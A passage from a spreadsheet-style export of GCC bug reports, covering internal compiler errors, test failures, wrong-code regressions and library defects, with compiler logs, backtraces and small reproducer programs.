FAIL: gcc.target/i386/sse4_1-pblendvb.c (test for excess errors)
WARNING: gcc.target/i386/sse4_1-pblendvb.c compilation failed to produce executable
FAIL: gcc.target/i386/sse4_2-popcntl.c (test for excess errors)
WARNING: gcc.target/i386/sse4_2-popcntl.c compilation failed to produce executable
FAIL: gcc.target/i386/sse4_2-popcntq.c (test for excess errors)
WARNING: gcc.target/i386/sse4_2-popcntq.c compilation failed to produce executable
The actual failures in gcc.log look like...
Executing on host: /sw/src/fink.build/gcc43-4.2.999-20071214/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc43-4.2.999-20071214/darwin_obj
dir/gcc/ /sw/src/fink.build/gcc43-4.2.999-20071214/gcc-4.3-20071214/gcc/testsuite/gcc.target/i386/sse4_1-insertps-2.c   -O2 -msse4.1 -fno-
show-column  -lm   -m32 -o ./sse4_1-insertps-2.exe    (timeout = 300)
:161:suffix or operands invalid for `insertps'
:164:suffix or operands invalid for `insertps'
:167:suffix or operands invalid for `insertps'
:168:suffix or operands invalid for `insertps'
compiler exited with status 1
output is:
:161:suffix or operands invalid for `insertps'
:164:suffix or operands invalid for `insertps'
:167:suffix or operands invalid for `insertps'
:168:suffix or operands invalid for `insertps'
FAIL: gcc.target/i386/sse4_1-insertps-2.c (test for excess errors)
Excess errors:
:161:suffix or operands invalid for `insertps'
:164:suffix or operands invalid for `insertps'
:167:suffix or operands invalid for `insertps'
:168:suffix or operands invalid for `insertps'
WARNING: gcc.target/i386/sse4_1-insertps-2.c compilation failed to produce executable</t>
  </si>
  <si>
    <t>GCC-46823</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: edge points to wrong declaration</t>
  </si>
  <si>
    <t>With the file:
http://geometrica.saclay.inria.fr/team/Marc.Glisse/tmp/ouin.cc.xz
compiled with:
c++ -frounding-math -O3 -c ouin.cc
I get the error message below.
A smaller version is available at:
http://geometrica.saclay.inria.fr/team/Marc.Glisse/tmp/a.cc
but delta made a number of illegal transformations.
ouin.cc: In function 'CGAL::Polynomial CGAL::internal::gcd_(const CGAL::Polynomial&amp; const CGAL::Polynomial&amp; CGAL::Unique_factorization_domain_tag) [with NT = CGAL::Polynomial &gt;]':
ouin.cc:66187:57: error: edge points to wrong declaration:
 &lt;function_decl 0x7fea48919300 _ZN4CGAL10PolynomialINS0_INS0_IN4CORE6BigIntEEEEEEC2ERKS4_.constprop.2093
    type &lt;method_type 0x7fea4b2e3d20
        type &lt;void_type 0x7fea556a2e70 void type_6 VOID
            align 8 symtab 0 alias set -1 canonical type 0x7fea556a2e70
            pointer_to_this &gt;
        QI
        size 
        unit size 
        align 8 symtab 0 alias set -1 canonical type 0x7fea4b2e3d20 method basetype 
        arg-types 
            chain 
                chain &gt;&gt;&gt;
        pointer_to_this &gt;
    addressable asm_written used static autoinline decl_5 QI file ouin.cc line 63200 col 14 align 16 context  initial  abstract_origin 
    arguments &lt;parm_decl 0x7fea46248a18 this
        type 
            public unsigned DI
            size 
            unit size 
            align 64 symtab 0 alias set -1 canonical type 0x7fea4cc26000&gt;
        readonly used unsigned DI file ouin.cc line 63200 col 37 size  unit size 
        align 64 context  abstract_origin 
        (reg/f:DI 3 bx [orig:64 this ] [64]) arg-type 
        incoming-rtl (reg:DI 5 di [ this ])
        chain 
            readonly used unsigned DI file ouin.cc line 63200 col 35 size  unit size 
            align 64 context  abstract_origin 
            (reg/v/f:DI 1 dx [orig:65 a0 ] [65]) arg-type 
            incoming-rtl (reg:DI 4 si [ a0 ])&gt;&gt;
    result 
        used ignored VOID file ouin.cc line 63202 col 44
        align 8 context  abstract_origin &gt;
    full-name CGAL::Polynomial::Polynomial(const NT&amp;) [with NT_ = CGAL::Polynomial &gt; CGAL::Polynomial::NT = CGAL::Polynomial &gt;]
    pending-inline-info 0x7fea4c02e310 template-info 0x7fea4cde7f20
    (mem:QI (symbol_ref:DI (_ZN4CGAL10PolynomialINS0_INS0_IN4CORE6BigIntEEEEEEC2ERKS4_.constprop.2093) [flags 0x3] ) [0 S1 A8])&gt;
 Instead of: &lt;function_decl 0x7fea4cc58100 __comp_ctor 
    type &lt;method_type 0x7fea4cc29888
        type &lt;void_type 0x7fea556a2e70 void type_6 VOID
            align 8 symtab 0 alias set -1 canonical type 0x7fea556a2e70
            pointer_to_this &gt;
        QI
        size 
        unit size 
        align 8 symtab 0 alias set -1 canonical type 0x7fea4cc29930 method basetype 
        arg-types 
            chain 
                chain &gt;&gt;&gt;
        pointer_to_this &gt;
    addressable used public static weak autoinline decl_5 QI defer-output file ouin.cc line 63200 col 14 align 16 context  initial  abstract_origin 
    arguments &lt;parm_decl 0x7fea4cc574c8 this
        type 
            public unsigned DI
            size 
            unit size 
            align 64 symtab 0 alias set -1 canonical type 0x7fea4cc26000&gt;
        readonly used unsigned DI file ouin.cc line 63200 col 37 size  unit size 
        align 64 context  abstract_origin  arg-type 
        chain 
            readonly used unsigned DI file ouin.cc line 63200 col 35 size  unit size 
            align 64 context  abstract_origin 
            arg-type &gt;&gt;
    result 
        ignored VOID file ouin.cc line 63202 col 44
        align 8 context &gt;
    full-name CGAL::Polynomial::Polynomial(const NT&amp;) [with NT_ = CGAL::Polynomial &gt; CGAL::Polynomial::NT = CGAL::Polynomial &gt;]
    pending-inline-info 0x7fea4c02e460 template-info 0x7fea4cde7f20
    struct-function 0x7fea4c024be0 chain &gt;
CGAL::internal::Coercion_traits_for_polynomial_comp_d B false&gt;::Type CGAL::internal::Coercion_traits_for_polynomial_comp_d B false&gt;::Cast::operator()(const B&amp;) const [with A = CGAL::Polynomial &gt; B = CORE::BigInt CGAL::internal::Coercion_traits_for_polynomial_comp_d B false&gt;::Type = CGAL::Polynomial &gt; &gt; typename CGAL::Coercion_traits::Type = CGAL::Polynomial &gt;]/6423(-1) @0x7fea4bd976e0 (asm: _ZNK4CGAL8internal37Coercion_traits_for_polynomial_comp_dINS_10PolynomialINS2_INS2_IN4CORE6BigIntEEEEEEES4_Lb0EE4CastclERKS4_.isra.1183.constprop.1969) (inline copy in CGAL::Polynomial CGAL::internal::gcd_(const CGAL::Polynomial&amp; const CGAL::Polynomial&amp; CGAL::Unique_factorization_domain_tag) [with NT = CGAL::Polynomial &gt;]/7969) (clone of CGAL::internal::Coercion_traits_for_polynomial_comp_d B false&gt;::Type CGAL::internal::Coercion_traits_for_polynomial_comp_d B false&gt;::Cast::operator()(const B&amp;) const [with A = CGAL::Polynomial &gt; B = CORE::BigInt CGAL::internal::Coercion_traits_for_polynomial_comp_d B false&gt;::Type = CGAL::Polynomial &gt; &gt; typename CGAL::Coercion_traits::Type = CGAL::Polynomial &gt;]/1325) availability:local analyzed 37 time 14 benefit (76 after inlining) 15 size 6 benefit (35 after inlining) 8 bytes stack usage reachable body local finalized inlinable
  called by: CGAL::Polynomial CGAL::internal::gcd_(const CGAL::Polynomial&amp; const CGAL::Polynomial&amp; CGAL::Unique_factorization_domain_tag) [with NT = CGAL::Polynomial &gt;]/7969 (1.00 per call) (inlined) 
  calls: CGAL::Handle_with_policy::~Handle_with_policy() [with T_ = CGAL::internal::Polynomial_rep &gt; HandlePolicy = CGAL::Handle_policy_no_union Allocator_ = std::allocator &gt; &gt;]/5298 (can throw external) CGAL::Handle_with_policy::~Handle_with_policy() [with T_ = CGAL::internal::Polynomial_rep &gt; HandlePolicy = CGAL::Handle_policy_no_union Allocator_ = std::allocator &gt; &gt;]/5298 (1.00 per call) (can throw external) CGAL::Polynomial::Polynomial(const NT&amp;) [with NT_ = CGAL::Polynomial &gt; CGAL::Polynomial::NT = CGAL::Polynomial &gt;]/4256 (1.00 per call) (can throw external) CGAL::internal::Coercion_traits_for_polynomial_comp_d B false&gt;::Type CGAL::internal::Coercion_traits_for_polynomial_comp_d B false&gt;::Cast::operator()(const B&amp;) const [with A = CGAL::Polynomial B = CORE::BigInt CGAL::internal::Coercion_traits_for_polynomial_comp_d B false&gt;::Type = CGAL::Polynomial &gt; typename CGAL::Coercion_traits::Type = CGAL::Polynomial]/10353 (inlined) (1.00 per call) (can throw external) 
  References: 
  Refering this function: 
ouin.cc:66187:57: internal compiler error: verify_cgraph_node failed</t>
  </si>
  <si>
    <t>GCC-42274</t>
  </si>
  <si>
    <t>[fortran-dev Regression] ICE: segmentation fault</t>
  </si>
  <si>
    <t>The attached code gives an ICE against the fortran-dev branch as of r154975.
[sfilippo@donald bug12]$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/local/gnudev/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../fortran-dev/configure --prefix=/usr/local/gnudev --enable-languages=cc++fortran : (reconfigured) ../fortran-dev/configure --prefix=/usr/local/gnudev --enable-languages=cc++fortran
Thread model: posix
gcc version 4.5.0 20091203 (experimental) (GCC) 
[sfilippo@donald bug12]$ gfortran  -c bug12.f03 
bug12.f03:229:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>sfilippone</t>
  </si>
  <si>
    <t>GCC-37769</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] internal compiler error: in reg_overlap_mentioned_for_reload_p at reload.c:6525</t>
  </si>
  <si>
    <t>gcc-4.3.0 fails to compile with this message when compiling
qtpfsgui-1.9.1.
g++ -c -pipe -funroll-loops -fstrength-reduce -fschedule-insns2 -felide-constructors -frerun-loop-opt -fexceptions -fno-strict-aliasing -fexpensive-optimizations -ffast-math -pipe -O2 -g -mieee -fno-schedule-insns -D_REENTRANT -Wall -W -DQT_NO_DEBUG_OUTPUT -DHAVE_FFTW -DI18NDIR=\/usr/share/qtpfsgui/i18n\ -DQT_NO_DEBUG -DQT_GUI_LIB -DQT_CORE_LIB -I/usr/lib/qt4/mkspecs/linux-g++ -I. -I/usr/include/QtCore -I/usr/include/QtCore -I/usr/include/QtGui -I/usr/include/QtGui -I/usr/include -I/usr/include/exiv2 -I/usr/include/OpenEXR -I/usr/include -Igenerated_moc -Igenerated_uic -o generated_obj/pde.o src/TM_operators/fattal02/pde.cpp
src/TM_operators/fattal02/pde.cpp: In function 'void exact_sollution(pfs::Array2D* pfs::Array2D*)':
src/TM_operators/fattal02/pde.cpp:273: warning: unused variable 'h'
src/TM_operators/fattal02/pde.cpp: In function 'void atimes(long unsigned int float* float* int)':
src/TM_operators/fattal02/pde.cpp:654: internal compiler error: in reg_overlap_mentioned_for_reload_p at reload.c:6525
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccXkDOUC.out file please attach this to your bugreport.
make: *** [generated_obj/pde.o] Error 1
$ gcc -v
Using built-in specs.
Target: sh4-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-languages=cc++objcobj-c++javafortran --enable-java-awt=gtk --disable-dssi --enable-plugin --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --build=sh4-redhat-linux
Thread model: posix
gcc version 4.3.0 20080428 (Red Hat 4.3.0-8) (GCC)</t>
  </si>
  <si>
    <t>GCC-32280</t>
  </si>
  <si>
    <t>_mm_srli_si128 heinous code for some shifts</t>
  </si>
  <si>
    <t>I lack words to describe what happens on x86-64 to
#include 
__m128i foo(__m128i a) { return _mm_srli_si128(a 8) }
int main() { return 0 }
# /usr/local/gcc-4.2-20060916/bin/gcc -O1 pr-psrldq.c -o pr-psrldq
000000000040042e :
  40042e:       66 0f 7f 44 24 d8       movdqa %xmm00xffffffffffffffd8(%rsp)
  400434:       48 8b 54 24 e0          mov    0xffffffffffffffe0(%rsp)%rdx
  400439:       48 89 d0                mov    %rdx%rax
  40043c:       31 d2                   xor    %edx%edx
  40043e:       48 89 44 24 e8          mov    %rax0xffffffffffffffe8(%rsp)
  400443:       48 89 54 24 f0          mov    %rdx0xfffffffffffffff0(%rsp)
  400448:       66 0f 6f 44 24 e8       movdqa 0xffffffffffffffe8(%rsp)%xmm0
  40044e:       c3                      retq
gcc-4.3-20070105 is still that creative.
As far as i know it's specific to x86-64 but i'm not sure if other shifting ops or specific values also are pathologic.</t>
  </si>
  <si>
    <t>tbptbp</t>
  </si>
  <si>
    <t>GCC-77480</t>
  </si>
  <si>
    <t>netbsd specfile will not link against libc when building -shared (+patch)</t>
  </si>
  <si>
    <t>Created attachment 39557
less bogus specfile for netbsd.
Attached a patch that I needed to build more things.</t>
  </si>
  <si>
    <t>coypu</t>
  </si>
  <si>
    <t>GCC-40502</t>
  </si>
  <si>
    <t>[4.5 Regression] crash in cp_diagnostic_starter</t>
  </si>
  <si>
    <t>I just tried to compile the Suse Linux package libmodplug-0.8.7-1.5
with the G++ compiler version 4.5 snapshot 20090618.
The compiler said
In file included from /usr/include/string.h:428:0
                 from load_pat.cpp:33:
In function 'char* strncpy(char* const char* size_t)'
/usr/include/bits/string3.h: In function 'void _ZL19pat_read_waveheaderP8_IO_FILEP10WaveHeaderi.clone.1(FILE* WaveHeader*)':
/usr/include/bits/string3.h:122:71: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source attached. Flag -O2 required.
Here is valgrind helping out with a stack backtrace.
==32091== Invalid read of size 2
==32091==    at 0x53989D: cp_diagnostic_starter (error.c:2581)
==32091==  Address 0x0 is not stack'd malloc'd or (recently) free'd</t>
  </si>
  <si>
    <t>GCC-19227</t>
  </si>
  <si>
    <t>[3.4 only] Error in gcc.c-torture/compile/20000804-1.c when using -fpic/-fPIC on i686-pc-linux-gnu</t>
  </si>
  <si>
    <t>When running the testsuite on 3.3 3.4 and mainline with -fpic or -fPIC I get 
the following additional error at -O0:
FAIL: gcc.c-torture/compile/20000804-1.c  -O0  
3.4 additionally gets an error at -O1 as seen in these results:
http://gcc.gnu.org/ml/gcc-testresults/2005-01/msg00029.html
http://gcc.gnu.org/ml/gcc-testresults/2005-01/msg00085.html
http://gcc.gnu.org/ml/gcc-testresults/2005-01/msg00084.html
The error message from the logfile is:
gcc.c-torture/compile/20000804-1.c:12: error: can't find a register in class 
`GENERAL_REGS' while reloading `asm'
Is there something to fix in the compiler the testcase or should the test be 
bypassed when using -fpic/-fPIC ?</t>
  </si>
  <si>
    <t>GCC-60493</t>
  </si>
  <si>
    <t>g++ throws segmentation fault on simple code</t>
  </si>
  <si>
    <t>Created attachment 32329
Preprocessed source
This simple incorrect code (works here to: http://ideone.com/QPwEPO):
  #include 
  template 
  class Splay {
    public:
      class iterator
  }
  template 
  class Splay::iterator : std::iterator {
  }
  Splay::iterator it
Crashes g++ with output:
  gcc_segfault.cpp: In instantiation of â€˜class Splay::iteratorâ€™:
  gcc_segfault.cpp:13:22:   required from here
  gcc_segfault.cpp:10:17: internal compiler error: Segmentation fault
   class Splay::iterator : std::iterator {
                   ^
  Please submit a full bug report
  with preprocessed source if appropriate.
  See  for instructions.
  Preprocessed source stored into /tmp/ccud4lbz.out file please attach this to your bugreport.
Proccessed source (/tmp/ccud4lbz.out) in attachment.
g++ version: g++ (Debian 4.8.2-16) 4.8.2</t>
  </si>
  <si>
    <t>marekrusinowski</t>
  </si>
  <si>
    <t>GCC-79827</t>
  </si>
  <si>
    <t>genautomata segmentation fault on NI-RT Linux</t>
  </si>
  <si>
    <t>Can't build GCC from source.
Specific Linux distro:
National Instruments RT Linux.
Using the straightforward approach download from your web - follow instructions - build
lead to the error like the log below - couldn't pass through genautomata.
So I made a static gcc 6.3.0 on Ubuntu 15.04 which was built without problems.
Then I copied the static gcc compiler to the National Instruments distro made sure that their proprietary gcc is absent and symlinked gcc cc etc. to my static version.
Same result again - could't build genautomata. See log below (this time copy+paste).
Reproducible on both physical and virtual machine with their distro.
I can send you the whole virtual machine (uncompressed &lt;1.8GiB) if you wish so that you can reproduce the bug.
-----------------
g++ -std=gnu++98   -g -DIN_GCC     -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wno-format -Wmissing-format-attribute -Woverloaded-virtual -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -fno-common  -DHAVE_CONFIG_H -DGENERATOR_FILE -fno-PIE -static-libstdc++ -static-libgcc  -no-pie -o build/genautomata \
    build/genautomata.o build/rtl.o build/read-rtl.o build/ggc-none.o build/vec.o build/min-insn-modes.o build/gensupport.o build/print-rtl.o build/hash-table.o build/read-md.o build/errors.o ../build-x86_64-pc-linux-gnu/libiberty/libiberty.a -lm
build/genautomata /Flash/gcc/build/gcc-6.3.0/gcc/common.md /Flash/gcc/build/gcc-6.3.0/gcc/config/i386/i386.md \
  insn-conditions.md &gt; tmp-automata.c
/bin/sh: line 1:  3668 Segmentation fault      build/genautomata /Flash/gcc/build/gcc-6.3.0/gcc/common.md /Flash/gcc/build/gcc-6.3.0/gcc/config/i386/i386.md insn-conditions.md &gt; tmp-automata.c
Makefile:2184: recipe for target 's-automata' failed
make[3]: *** [s-automata] Error 139</t>
  </si>
  <si>
    <t>pkrizek</t>
  </si>
  <si>
    <t>GCC-3487</t>
  </si>
  <si>
    <t>unrecognized token before #include points to wrong source</t>
  </si>
  <si>
    <t>[ Reported to the Debian BTS as report #85908.
  Please CC 85908-quiet@bugs.debian.org on replies.
  Log of report can be found at http://bugs.debian.org/85908 ]
unrecognized tokens before an include file point to the wrong file in
the error message.
--- begin
RandomGarbage
#include 
int main()
{
}
--- end
In file included from bug-85908.c:2:
/usr/lib/gcc-lib/i386-linux/3.0/include/stddef.h:147: syntax error before typedef
If there is more than one token ('Random Garbage') the error message point to the correct position:
bug-85908.c:1: parse error before Garbage
In file included from bug-85908.c:2:
/usr/lib/gcc-lib/i386-linux/3.0/include/stddef.h:147: syntax error before typedef
So the bug submitter wants this message for exactly one unrecognized
token as well (point to the bug-85908.c file)
Preprocessed source is:
# 1 bug-85908.c
RandomGarbage
# 1 /usr/lib/gcc-lib/i386-linux/3.0/include/stddef.h 1 3
# 147 /usr/lib/gcc-lib/i386-linux/3.0/include/stddef.h 3
typedef int ptrdiff_t
# 199 /usr/lib/gcc-lib/i386-linux/3.0/include/stddef.h 3
typedef unsigned int size_t
# 287 /usr/lib/gcc-lib/i386-linux/3.0/include/stddef.h 3
typedef long int wchar_t
# 3 bug-85908.c 2
int main()
{
}
Release:
3.0 (Debian GNU/Linux)
Environment:
System: Debian GNU/Linux (testing/unstable)
Architecture: i686
host: i386-linux
build: i386-linux
target: i386-linux
configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux</t>
  </si>
  <si>
    <t>85908-quiet</t>
  </si>
  <si>
    <t>GCC-46662</t>
  </si>
  <si>
    <t>[OOP] gfortran accepts CALL polymorphic%abstract_type%ppc()</t>
  </si>
  <si>
    <t>Tracking - not yet clear whether gfortran mishandles it.
Reported by salvatore at c.l.f http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/a0857fa4a692d518#
gfortran currently rejects:
 CALL polymorphic%abstract_type%tbp()
Which seems to be valid according to the quotes from the standard (see below). However if it is valid I fail to find a restriction prohibiting a call to a deferred TBP which has to be invalid.
R1220 call-stmt is CALL procedure-designator [ ( [ actual-arg-spec-list ] ) ]
R1221 procedure-designator is procedure-name
                           or proc-component-ref
                           or data-ref % binding-name
R611 data-ref is part-ref [ % part-ref ] ...
R612 part-ref is part-name [ ( section-subscript-list ) ] [ image-selector ]
C611 (R611) If the rightmost part-name is of abstract type data-ref shall be polymorphic.</t>
  </si>
  <si>
    <t>GCC-59129</t>
  </si>
  <si>
    <t>assert fail for tree.c:4150</t>
  </si>
  <si>
    <t>Created attachment 31216
C source code
I just tried to compile package gplcver-2.12a-7.fc20 with
gcc 4.9 trunk dated 20131113. It said
v_vpi3.c: In function 'set_vpisfcall_retval':
v_vpi3.c:4542:13: internal compiler error: Segmentation fault
 static void set_vpisfcall_retval(struct h_t *hp p_vpi_value value_p)
             ^
0xa76c9f crash_signal
    ../../src/trunk/gcc/toplev.c:334
0xcb8e83 build2_stat(tree_code tree_node* tree_node* tree_node*)
    ../../src/trunk/gcc/tree.c:4150
0x67938c gimple_assign_rhs_to_tree(gimple_statement_d*)
    ../../src/trunk/gcc/cfgexpand.c:103
0xc35851 insert_debug_temp_for_var_def(gimple_stmt_iterator_d* tree_node*)
    ../../src/trunk/gcc/tree-ssa.c:442
0xc35f49 insert_debug_temps_for_defs(gimple_stmt_iterator_d*)
    ../../src/trunk/gcc/tree-ssa.c:549
0x84607a gsi_remove(gimple_stmt_iterator_d* bool)
    ../../src/trunk/gcc/gimple-iterator.c:563
0xf7d77c insert_trap_and_remove_trailing_statements
    ../../src/trunk/gcc/gimple-ssa-isolate-paths.c:110
0xf7e552 gimple_ssa_isolate_erroneous_paths
    ../../src/trunk/gcc/gimple-ssa-isolate-paths.c:305
0xf7e552 execute
    ../../src/trunk/gcc/gimple-ssa-isolate-paths.c:370
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Preprocessed source code attached. Flags -g -O2 required.</t>
  </si>
  <si>
    <t>GCC-156</t>
  </si>
  <si>
    <t>Spurious scanf(%zu) warning</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Wed 29 Mar 2000 12:14:07 +0100 (BST)
 Original-Message-ID: 
 GCC snapshot 20000327 on i686-pc-linux-gnu gives a spurious warning about
 the use of the %zu format with scanf (using -std=c99 -Wformat).  (My copy
 of C99 is currently on order so I'm presuming here that the same
 specification of this format applies as in the last public draft.)
 The test case is:
 ==========
 extern int scanf(const char * ...)
 typedef __SIZE_TYPE__ size_t
 size_t foo(void) { size_t t scanf(%zu  return t }
 ==========
 Messages given:
 $ egcc -std=c99 -Wformat -S scanf-bug.c
 scanf-bug.c: In function `foo':
 scanf-bug.c:5: warning: use of `z' length character with `u' type character
 $ egcc -v
 Reading specs from /opt/gcc/snapshot/lib/gcc-lib/i686-pc-linux-gnu/2.96/specs
 gcc version 2.96 20000327 (experimental)
 -- 
 Joseph S. Myers
 jsm28@cam.ac.uk
Release:
2.95.2</t>
  </si>
  <si>
    <t>CLASSPATH-31311</t>
  </si>
  <si>
    <t>Quitting applet can hang X server</t>
  </si>
  <si>
    <t>After playing http://oneslime.net for a prolonged period of time quitting the application using the keyboard (alt-F4) can cause the X server on the machine to hang for 10-15 minutes until it times out (this might be triggered by the screensaver coming on).
Unknown if quitting using the mouse can cause this.  It doesn't happen every time an applet is closed but happens often enough to be a problem.</t>
  </si>
  <si>
    <t>fkung</t>
  </si>
  <si>
    <t>GCC-703</t>
  </si>
  <si>
    <t>simple parse error reported as compilor error</t>
  </si>
  <si>
    <t>Internal Compilor Error
Please submit a full bug report
See  for instructions.
This is using the distribution of the c++ headers that came
with gcc.
I got this message from the following line of code:
std::std&lt;arlut::imps::probes::event::localeventservice::
idl::Connection_var&gt; disconnectionSet
The code is obviously incorrect and should have been
std::set&lt;arlut::imps::probes::event::localeventservice::
idl::Connection_var&gt; disconnectionSet
However this should have just caused a parse error
with a warning such as
std not found in namespace std
Release:
gcc 2.95.2 19991024
Environment:
RedHat Linux 6.2
How-To-Repeat:
Should be very easy to duplicate.</t>
  </si>
  <si>
    <t>kmoran</t>
  </si>
  <si>
    <t>GCC-7296</t>
  </si>
  <si>
    <t>Internal compiler error when getting a pointer to a templated function inside a templated class</t>
  </si>
  <si>
    <t>bug.cc: In function `int main()':
bug.cc:19: Internal compiler error 56.
bug.cc:19: Please submit a full bug report.
bug.cc:19: See  for instructions.
Release:
2.95.3 20010315
Environment:
linux x86
How-To-Repeat:
compile this:
template 
class A {
public:
  template 
  static int foo() {
    return a+f
  }
}
int main() {
  typedef int (*FUNC_TYPE) ()
  FUNC_TYPE pfunc = A::foo
  int x = pfunc()  
  return 0
}</t>
  </si>
  <si>
    <t>GCC-82841</t>
  </si>
  <si>
    <t>Segfault in gfc_simplify_transfer</t>
  </si>
  <si>
    <t>From: https://groups.google.com/forum/#!topic/comp.lang.fortran/NDE6JKTFbNU
   integer parameter :: N = 2
   character(len=1) :: chr(N)
   chr = transfer(source=repeat(xncopies=N) mold=[ character(len=1) :: ] size=N)
end
[pault@pc30 fortranfan]$ ~/irun/bin/gfortran -static-libgfortran  f*2.f90
f951: internal compiler error: Segmentation fault
0xcb6d8f crash_signal
	../../trunk/gcc/toplev.c:324
0x791330 gfc_simplify_transfer(gfc_expr* gfc_expr* gfc_expr*)
	../../trunk/gcc/fortran/simplify.c:6589
0x71de22 do_simplify
	../../trunk/gcc/fortran/intrinsic.c:4407
0x7282b6 gfc_intrinsic_func_interface(gfc_expr* int)
	../../trunk/gcc/fortran/intrinsic.c:4777
0x77d11c resolve_unknown_f
	../../trunk/gcc/fortran/resolve.c:2865
0x77d11c resolve_function
	../../trunk/gcc/fortran/resolve.c:3174
0x779a1d gfc_resolve_expr(gfc_expr*)
	../../trunk/gcc/fortran/resolve.c:6702
0x77237f gfc_resolve_code(gfc_code* gfc_namespace*)
	../../trunk/gcc/fortran/resolve.c:11060
0x77498f resolve_codes
	../../trunk/gcc/fortran/resolve.c:16406
0x774a5e gfc_resolve(gfc_namespace*)
	../../trunk/gcc/fortran/resolve.c:16441
0x763414 resolve_all_program_units
	../../trunk/gcc/fortran/parse.c:6030
0x763414 gfc_parse_file()
	../../trunk/gcc/fortran/parse.c:6280
0x7a72ff gfc_be_parse_file
	../../trunk/gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-84071</t>
  </si>
  <si>
    <t>[7/8 regression] wrong elimination of zero-extension after sign-extended load</t>
  </si>
  <si>
    <t>PR59461 changed nonzero_bits1 incorrectly for subregs:
          /* On many CISC machines accessing an object in a wider mode
             causes the high-order bits to become undefined.  So they are
             not known to be zero.  */
          rtx_code extend_op
          if ((!WORD_REGISTER_OPERATIONS
               /* If this is a typical RISC machine we only have to worry
                  about the way loads are extended.  */
               || ((extend_op = load_extend_op (inner_mode)) == SIGN_EXTEND
                   ? val_signbit_known_set_p (inner_mode nonzero)
                   : extend_op != ZERO_EXTEND)
               || (!MEM_P (SUBREG_REG (x)) &amp;&amp; !REG_P (SUBREG_REG (x))))
              &amp;&amp; xmode_width &gt; inner_width)
            nonzero
              |= (GET_MODE_MASK (GET_MODE (x)) 
If WORD_REGISTER_OPERATIONS is set and load_extend_op is ZERO_EXTEND rtl like
(subreg:SI (reg:HI 125) 0)
is assumed to be always zero-extended. This is incorrect since modes that are smaller than WORD_MODE may contain random top bits. This is equally true for RISC and CISC ISAs and independent of WORD_REGISTER_OPERATIONS so it's unclear why the !REG_P check was added.
On ARM this causes the following bug:
arm-none-eabi-gcc -march=armv7-a -marm -O2 -S -o- -mbig-endian
typedef union 
{
  signed short ss
  unsigned short us
  int x
} U
int f(int x int y int z int a U u)
{
  return (u.ss &lt;= 0) + u.us
}
	ldrsh	r3 [sp]
	sxth	r0 r3
	cmp	r0 #0  // correctly uses sign-extended value
	movgt	r0 r3  // wrong - must be zero-extended!!!
	addle	r0 r3 #1
	bx	lr</t>
  </si>
  <si>
    <t>wilco</t>
  </si>
  <si>
    <t>GCC-71771</t>
  </si>
  <si>
    <t>DR 685 applied incorrectly</t>
  </si>
  <si>
    <t>The resolution of LWG DR 685 (http://cplusplus.github.io/LWG/lwg-defects.html#685) *replaces* the non-member operator- of reverse_iterator and move_iterator with a cross-type overload constrained via expression SFINAE on the return type.
libstdc++ trunk adds the cross-type overload for reverse_iterator but *leaves the old single-type overload in place* so operator- does not properly SFINAE for two reverse_iterators with the same (non-differentiable) base type.
move_iterator also has the new cross-type overload its old single-type overload has been left in place but constrained similarly. While technically conforming the result is that for a move_iterator i i - {} and {} - i will match this old single-type overload instead of being ill-formed.</t>
  </si>
  <si>
    <t>Casey</t>
  </si>
  <si>
    <t>GCC-48824</t>
  </si>
  <si>
    <t>Wrong link to fixed bug-list on release notes</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/gcc-4.5/changes.html
At the bottom where it links to the fixed bug list for the 4.5.3 release it links to:
http://gcc.gnu.org/bugzilla/buglist.cgi?bug_status=RESOLVED&amp;resolution=FIXED&amp;target_milestone=4.5.2
Link should be:
http://gcc.gnu.org/bugzilla/buglist.cgi?bug_status=RESOLVED&amp;resolution=FIXED&amp;target_milestone=4.5.3
Thanks in advance.</t>
  </si>
  <si>
    <t>superbsubs</t>
  </si>
  <si>
    <t>GCC-50815</t>
  </si>
  <si>
    <t>ICE on allocation of deferred length character scalar dummy argument when -fbounds-check</t>
  </si>
  <si>
    <t>Created attachment 25563
reproducer &amp; output for ICE
The following code (test.f90):
SUBROUTINE TEST(VALUE)
    IMPLICIT NONE
    CHARACTER(LEN=:)    ALLOCATABLE    ::    VALUE
    CHARACTER(LEN=128)    ::    VAL
    VALUE = VAL
END SUBROUTINE TEST
triggers an ICE with gfortran 4.6.1 when -fbounds-check is used.
The output from
gfortran -v -save-temps -fbounds-check test.f90
is attached</t>
  </si>
  <si>
    <t>GCC-6041</t>
  </si>
  <si>
    <t>x86: No inline FPU code generated even if arch says target always has FPU</t>
  </si>
  <si>
    <t>The info docs say:
`-mno-fancy-math-387'
     Some 387 emulators do not support the `sin' `cos' and `sqrt'
